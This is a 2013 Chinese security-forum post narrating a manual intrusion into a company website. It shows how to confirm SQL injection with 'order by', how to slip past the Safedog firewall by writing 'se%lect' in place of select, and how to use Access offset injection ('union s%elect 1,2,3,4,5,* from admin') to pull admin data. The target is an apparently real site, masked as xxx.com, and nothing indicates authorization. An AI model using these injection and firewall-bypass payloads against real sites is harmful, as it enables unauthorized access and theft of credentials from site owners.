找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2057|回复: 0
打印 上一主题 下一主题

一次手工渗透突破安全狗防御+ACCESS偏移注入

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-8 21:49:45 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
打开网站,一个企业站。
* F. w+ M; F- A" ~! d  G* d/ j$ s* l" Q
; Z$ w) I! D1 n4 @
顺手加个admin
: s: w1 j1 W# ]! @  b1 Y5 D
! J* g% j( d. I2 x7 U4 Y& N2 |2 s$ l4 \  ]
默认后台。
# Q4 a0 U0 p0 L+ l' e' H回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。​
$ _  |( \0 m$ |) f. w! B/ \( T( ]0 o3 X- S' ?9 n; c
  F6 E& ^3 S4 M. ]% j) |' t' c2 o

" l1 L  ^# u1 r- \1 H; x9 g+ t所以就不用御剑扫了,待会直接封IP。
1 Q$ S. o7 k$ }: Y' Q5 K
! T! R6 t5 }( e; `6 ]+ G用order by语句判断是否存在注入。
/ v( e6 @: K6 c8 |- z) m; O/ Z, }# ?8 t" ghttp://www.xxx.com /product_show.asp?id=997 order by 1
7 R6 _7 [* E/ b1 R: R6 t( Bhttp://www.xxx.com /product_show.asp?id=997 order by 100
6 q9 n7 w* O% T现在存在注入,经测试后发现是9个字段。' {0 U2 G1 `) m; m/ M

% [7 m8 K  q* p, y+ b$ z接下来进行联合查询,猜是否存在admin表。
6 w% b! K8 `8 f8 ~" v2 i( Z3 ehttp://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。​: m7 G% A( h' z

& I' l5 Z" |1 f; L
+ x% j, t6 x4 b  d7 R) C" t% z% b$ V  |$ ~. W1 P, A2 x/ Q
在select中间加个%,se%lect绕过安全狗。
4 @5 r8 V; c# s* P( C6 Q% O
+ B6 C1 \4 L$ ]# P" P2 |; o% C/ W: d
发现存在admin表,然后开始手工猜常用的字段。  v( @5 F$ @/ i* ^: N* o! z
纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。2 _% {) L& C% }8 J4 q; z

# t9 z5 V/ Z, z6 N突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。9 L- y1 s: w4 J! w1 |& j. K2 ]" N

* @  e( N+ v$ @  L& z# ^: K* F- h科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。
$ C, w9 j/ G4 x  u! e3 J2 Qhttp://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin
: T2 Y7 r5 T' m( y( l  x好了,敏感内容出显了。​
) g7 u- N( ?3 ]. G0 Q% C, ?1 a( {8 d( ?: X$ B; ?7 b6 C* i8 C

3 e5 m6 \; D# j/ A' j2 {. t: C/ t. ]0 R5 p5 ]
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表